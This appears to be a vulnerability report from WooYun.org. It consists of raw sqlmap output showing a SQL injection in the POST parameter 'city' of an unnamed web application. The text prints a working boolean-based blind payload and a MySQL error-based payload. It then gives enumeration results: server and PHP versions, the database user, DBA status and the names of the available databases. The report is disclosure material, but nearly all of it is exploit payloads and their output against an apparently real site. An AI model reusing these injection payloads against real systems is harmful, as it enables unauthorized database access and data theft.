WooYun.org

---
Parameter: city (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: city=sdzz' AND 8262=8262 AND 'aUgY'='aUgY&search=1
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: city=sdzz' AND (SELECT 6955 FROM(SELECT COUNT(*),CONCAT(0x716b7a6271,(SELECT (ELT(6955=6955,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xQsj'='xQsj&search=1
---
web application technology: Apache 2.2.21, PHP 5.3.10
back-end DBMS: MySQL 5.0
current user:    '[email protected]'
current user is DBA:    False
available databases [2]:
[*] information_schema
[*] zxq